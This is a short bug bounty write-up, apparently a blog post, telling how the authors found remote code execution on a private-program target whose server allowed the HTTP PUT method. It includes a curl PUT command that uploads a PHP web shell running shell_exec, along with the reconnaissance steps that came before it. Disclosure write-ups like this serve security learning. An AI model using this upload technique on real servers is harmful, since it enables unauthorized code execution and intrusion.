Rce via server misconfiguration Put Http method enabled

Hey guys today i want to speak about the first ‘Rce’ i found it at a privet program in “hackerone.com” with my best friend “Ahmed elmalkey”,

First we make subdomain-enumeration via many tools like ”subfinder with api keys ” now we had subdomains we went to check live subdomains after that

we sent the live subdomains to Nuceli after 5 min we Got a alert “http method enabled” “oh no is this real or false positive “ we said

we went to check was the alert is real or no

curl -X options https://target.ltd

GET,PUT,HEAD enabled hey this is real now we went to make POC

curl -X PUT https://target.tld/POC.php
-H “Content-Length: 69;Accept: */* “ -d “<?php
$output = shell_exec(‘ls -lart’);
echo “<pre>$output</pre>”;
?>”

now we got rce at server done.

thanks for read the essay and i’m sorry for any misspell because this my first writeup